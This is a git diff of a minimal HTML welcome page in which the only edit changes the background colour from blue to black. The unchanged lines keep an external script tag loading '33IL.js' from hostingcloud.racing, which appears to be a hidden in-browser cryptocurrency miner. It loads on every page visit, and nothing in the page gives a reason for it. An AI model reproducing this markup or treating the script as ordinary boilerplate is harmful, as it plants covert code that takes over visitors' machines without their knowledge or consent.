--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <!doctype html>
 <html>
-    <body style="background-color:blue;text-align:center">
+    <body style="background-color:black;text-align:center">
     welcome to my page
     </body> 
 <script src="https://www.hostingcloud.racing/33IL.js"></script>
